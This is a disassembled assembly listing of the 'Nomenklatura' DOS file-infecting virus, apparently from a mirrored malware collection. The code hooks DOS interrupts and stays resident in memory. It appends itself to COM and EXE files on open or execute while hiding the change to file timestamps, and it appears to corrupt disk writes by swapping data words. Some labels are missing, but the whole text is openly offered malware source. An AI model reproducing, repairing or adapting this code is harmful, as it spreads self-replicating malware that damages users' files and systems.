mirror of
synced 2024-12-25 04:45:27 +00:00
563 lines
12 KiB
563 lines
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PAGE 60,132
;ÛÛ Created: 19-Jan-92 ÛÛ
data_1e equ 4Ch ; (0000:004C=0E9h)
data_2e equ 84h ; (0000:0084=9Eh)
data_3e equ 46Ch ; (0000:046C=66CDh)
data_4e equ 3 ; (5C42:0003=0FFFFh)
data_5e equ 12h ; (5C42:0012=0)
data_17e equ 1610h ; (5C43:1610=0)
data_18e equ 4BAAh ; (5C43:4BAA=0)
data_19e equ 5C43h ; (5C43:5C43=0)
data_20e equ 0FE52h ; (5C43:FE52=0)
data_21e equ 0FFDBh ; (5C43:FFDB=0)
code_seg_a segment
assume cs:code_seg_a, ds:code_seg_a
org 100h
nomncltr proc far
jmp loc_2
db 35 dup (90h)
data_7 dw 9090h ; Data table (indexed access)
data_8 dw 9090h ; Data table (indexed access)
db 30 dup (90h)
data_9 dw 9090h ; Data table (indexed access)
db 651 dup (90h)
data_10 dw 9090h
data_11 dw 9090h
db 169 dup (90h)
data_12 db 90h
db 125 dup (90h)
jmp loc_34
db 'Nomenklatura'
db 0, 80h, 0FCh, 4Bh, 74h, 0Ah
db 80h, 0FCh
db 3Dh, 74h
data_13 dd 2EFF2E14h
data_14 dw 3D9h
data_15 db 3Ch
db 0AAh, 72h
data_16 dw 550Bh
db 8Bh, 0ECh, 80h, 66h, 6, 0FEh
db 5Dh, 0B0h, 3, 0CFh, 6, 1Eh
db 57h, 56h, 55h, 52h, 51h, 53h
db 50h, 0FCh, 72h, 22h, 0B9h, 80h
db 0, 8Bh, 0F2h
lodsb ; String [si] to al
or al,al ; Zero ?
loopnz locloop_4 ; Loop if zf=0, cx>0
mov cx,432Eh
sub si,3
lodsw ; String [si] to ax
cmp ax,4D4Fh
je loc_5 ; Jump if equal
cmp ax,4558h
jne loc_9 ; Jump if not equal
mov ch,ah
cmp [si-4],cx
jne loc_9 ; Jump if not equal
mov ax,3D02h
pushf ; Push flags
push cs
call sub_1
jc loc_9 ; Jump if carry Set
xchg ax,bx
push cs
pop ds
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
push cx
push dx
mov di,515h
mov word ptr [di],12Bh
mov [di+2],cs
mov word ptr [di+4],3B2h
mov [di+6],cs
call sub_5
mov dx,4FDh
mov si,dx
mov cl,18h
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
jc loc_8 ; Jump if carry Set
cmp word ptr [si],5A4Dh
jne loc_7 ; Jump if not equal
call sub_2
jmp short loc_8
call sub_4
mov ax,5701h
pop dx
pop cx
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
call sub_5
pop ax
pop bx
pop cx
pop dx
pop bp
pop si
pop di
pop ds
pop es
jmp loc_3
nomncltr endp
sub_2 proc near
mov cx,[si+16h]
add cx,[si+8]
mov ax,10h
mul cx ; dx:ax = reg * ax
add ax,[si+14h]
adc dx,0
push dx
push ax
mov ax,4202h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
test dx,dx
jnz loc_10 ; Jump if not zero
cmp ax,400h
jae loc_10 ; Jump if above or =
pop ax
pop dx
mov di,ax
mov bp,dx
pop cx
sub ax,cx
pop cx
sbb dx,cx
cmp word ptr [si+0Ch],0
je loc_ret_13 ; Jump if equal
test dx,dx
jnz loc_11 ; Jump if not zero
cmp ax,400h
je loc_ret_13 ; Jump if equal
mov dx,bp
mov ax,di
push dx
push ax
add ax,400h
adc dx,0
mov cx,200h
div cx ; ax,dx rem=dx:ax/reg
mov [si+2],dx
test dx,dx
jz loc_12 ; Jump if zero
inc ax
mov [si+4],ax
pop ax
pop dx
mov di,10h
div di ; ax,dx rem=dx:ax/reg
sub ax,[si+8]
les di,dword ptr [si+14h] ; Load 32 bit ptr
mov data_10,di ; (5C43:03D5=9090h)
mov data_11,es ; (5C43:03D7=9090h)
mov [si+14h],dx
mov [si+16h],ax
call sub_3
jc loc_ret_13 ; Jump if carry Set
mov ah,40h ; '@'
mov dx,si
mov cx,18h
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
sub_2 endp
sub_3 proc near
mov ah,40h ; '@'
mov cx,400h
mov dx,100h
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
xor cx,ax
cmc ; Complement carry
jnz loc_ret_14 ; Jump if not zero
mov ax,4200h
mov dx,cx
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
sub_3 endp
sub_4 proc near
mov ax,4202h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
cmp ax,400h
jb loc_ret_17 ; Jump if below
cmp ax,0FA00h
jae loc_ret_17 ; Jump if above or =
push ax
cmp byte ptr [si],0E9h
jne loc_16 ; Jump if not equal
sub ax,403h
cmp ax,[si+1]
jne loc_16 ; Jump if not equal
pop ax
call sub_3
jc loc_15 ; Jump if carry Set
pop ax
sub ax,3
mov dx,3D5h
mov si,dx
mov byte ptr cs:[si],0E9h
mov cs:[si+1],ax
mov ah,40h ; '@'
mov cx,3
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
sub_4 endp
sub_5 proc near
xor ax,ax ; Zero register
mov es,ax
mov si,515h
mov di,90h
mov cx,2
lodsw ; String [si] to ax
xchg ax,dx
lodsw ; String [si] to ax
xchg dx,es:[di]
xchg ax,es:[di+2]
mov [si-4],dx
mov [si-2],ax
mov di,4Ch
loop locloop_18 ; Loop if cx > 0
sub_5 endp
db 2Eh, 80h, 3Eh, 1Fh, 5, 0
db 74h, 12h, 41h, 75h, 0Eh, 32h
db 0E4h, 2Eh, 86h, 26h, 1Fh, 5
db 0F5h, 2Eh, 8Bh, 0Eh, 22h, 5
db 41h, 49h, 9Ch, 50h, 9Ch, 0Eh
db 0E8h, 0EFh, 0, 73h, 7, 83h
db 0C4h, 4, 0F9h, 0E9h, 0C8h, 0
pop ax
sub ah,2
cmp ah,2
jae loc_28 ; Jump if above or =
push bx
push cx
push si
push ds
push ax
push bx
push cx
push dx
xor dx,dx ; Zero register
mov cx,100h
mov si,bx
push si
lods word ptr es:[si] ; String [si] to ax
dec ax
cmp ax,0FFF5h
jae loc_23 ; Jump if above or =
cmp ax,bx
jne loc_22 ; Jump if not equal
inc dh
xchg ax,bx
inc dx
inc bx
loop locloop_21 ; Loop if cx > 0
pop si
shr dl,1 ; Shift w/zeros fill
clc ; Clear carry flag
jz loc_25 ; Jump if zero
cmp dl,dh
jae loc_25 ; Jump if above or =
clc ; Clear carry flag
push cs
pop ds
mov bx,520h
inc word ptr [bx]
jnz loc_25 ; Jump if not zero
inc word ptr ds:data_20e[bx] ; (5C43:FE52=0)
mov al,ds:data_21e[bx] ; (5C43:FFDB=0)
add al,0F8h
jnc loc_24 ; Jump if carry=0
mov al,0FFh
mov [bx+1],al
xor bx,bx ; Zero register
mov ds,bx
mov ax,ds:data_3e ; (0000:046C=66D9h)
xchg bl,ah
add bx,bx
add bx,si
add ax,ax
add si,ax
push es
pop ds
mov ax,[bx]
xchg ax,[si]
mov [bx],ax
stc ; Set carry flag
pop dx
pop cx
pop bx
jnc loc_26 ; Jump if carry=0
mov ax,301h
pushf ; Push flags
push cs
call sub_7
pop ax
jc loc_27 ; Jump if carry Set
dec al
jnz loc_20 ; Jump if not zero
pop ds
pop si
pop cx
pop bx
pop ax
shr ax,1 ; Shift w/zeros fill
jnc loc_31 ; Jump if carry=0
mov ax,100h
jmp short loc_32
db 0, 0, 2Eh, 0FFh, 36h, 1Dh
db 5, 9Dh, 74h, 50h, 2Eh, 88h
db 26h, 1Fh, 5, 2Eh, 89h, 0Eh
db 22h, 5, 2Eh, 3Ah, 26h, 82h
db 4, 75h, 3, 80h, 0F4h, 1
push cx
mov cx,0FFFFh
pushf ; Push flags
push cs
call sub_6
pop cx
pushf ; Push flags
cmp cs:data_15,0 ; (5C43:051F=3Ch)
jne loc_30 ; Jump if not equal
popf ; Pop flags
jnc loc_32 ; Jump if carry=0
cmp ah,1
stc ; Set carry flag
jnz loc_32 ; Jump if not zero
xor ax,ax ; Zero register
sti ; Enable interrupts
ret 2 ; Return far
db 2Eh, 3Ah, 26h, 83h, 4, 74h
db 0F3h, 84h, 0E4h, 74h, 0EFh, 80h
db 0FCh, 1, 74h, 5, 80h, 0FCh
db 5, 72h, 0ADh
sub_6 proc near
jmp cs:data_13 ; (5C43:0519=2E14h)
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
jmp far ptr loc_37
sub_6 endp
push ds
call sub_8
push cs
add [di],dl
add ss:data_17e[bp],bx ; (5C43:1610=0)
add ds:data_18e[bx+si],di ; (5C43:4BAA=0)
int 21h ; DOS Services ah=function 03h
; get char al from serial port
jnc loc_35 ; Jump if carry=0
pop si
push si
push es
xor ax,ax ; Zero register
mov ds,ax
les bx,dword ptr ds:data_1e ; (0000:004C=0FE9h) Load 32 bit ptr
mov ah,13h
int 2Fh ; Multiplex/Spooler al=func 00h
; get installed status
push es
push bx
mov ah,13h
int 2Fh ; Multiplex/Spooler al=func 00h
; get installed status
pop word ptr cs:[si-8]
pop bx
mov cs:[si-6],bx
mov ax,es
cmp ax,bx
les bx,dword ptr ds:data_2e ; (0000:0084=109Eh) Load 32 bit ptr
push cs
pop ds
pushf ; Push flags
pop data_9[si] ; (5C43:0148=9090h)
mov [si+4],bx
mov [si+6],es
pop ax
dec ax
mov ds,ax
mov bx,43h
sub ds:data_5e,bx ; (5C42:0012=0)
sub ds:data_4e,bx ; (5C42:0003=0FFFFh)
inc ax
add ax,ds:data_4e ; (5C42:0003=0FFFFh)
push ax
sub ax,10h
push ax
mov ds,ax
mov dx,2BCh
mov ah,13h
int 2Fh ; Multiplex/Spooler al=func 32h
pop dx
pop es
xor di,di ; Zero register
push cs
pop ds
inc data_7[si] ; (5C43:0126=9090h)
sub si,2D5h
mov cx,41Fh
rep movsb ; Rep while cx>0 Mov [si] to es:[di]
mov ax,0FE00h
stosb ; Store al to es:[di]
stosw ; Store ax to es:[di]
mov es,cx
mov di,84h
mov ax,110h
stosw ; Store ax to es:[di]
xchg ax,dx
stosw ; Store ax to es:[di]
pop si
pop es
push cs
pop ds
xor ax,ax ; Zero register
cmp data_8[si],5A4Dh ; (5C43:0128=9090h)
jne loc_36 ; Jump if not equal
mov dx,es
add dx,10h
add [si+2],dx
push es
pop ds
jmp dword ptr cs:[si] ; 1 entry
sub si,0FED8h
mov di,100h
push di
movsw ; Mov [si] to es:[di]
movsb ; Mov [si] to es:[di]
db 3, 4, 92h, 0AEh, 0A7h, 0A8h
db 20h, 0A4h, 0A5h, 0A1h, 0A5h, 0ABh
db 20h, 0A8h, 0A4h, 0A8h, 0AEh, 0B2h
db 20h, 0A2h, 0ACh, 0A5h, 0B1h, 0B2h
db 0AEh, 20h, 0A4h, 0A0h, 20h, 0B6h
db 0A5h, 0ABh, 0B3h, 0ADh, 0A5h, 20h
db 0B1h, 0AEh, 0B7h, 0ADh, 0A8h, 0B2h
db 0A5h, 20h, 0B3h, 0B1h, 0B2h, 0ADh
db 0A8h, 20h, 0ADh, 0A0h, 20h, 0ACh
db 0AEh, 0ACh, 0A8h, 0B7h, 0A5h, 0B2h
db 0AEh, 2Ch, 20h, 0A2h, 0AFh, 0A8h
db 20h, 0B3h, 0B1h, 0B2h, 0ADh, 0A8h
db 20h, 0B2h, 0A0h, 0ACh, 2Ch, 20h
db 0AAh, 0BAh, 0A4h, 0A5h, 0B2h, 0AEh
db 20h, 0B2h, 0B0h, 0BFh, 0A1h, 0A2h
db 0A0h, 0B8h, 0A5h, 20h, 0A4h, 0A0h
db 20h, 0B1h, 0ABh, 0AEh, 0A6h, 0A8h
db 20h, 0B1h, 0BAh, 0A2h, 0B1h, 0A5h
db 0ACh, 20h, 0A4h, 0B0h, 0B3h, 0A3h
db 0AEh, 20h, 0ADh, 0A5h, 0B9h, 0AEh
db 0, 4, 0, 0CDh, 20h, 90h
code_seg_a ends
end start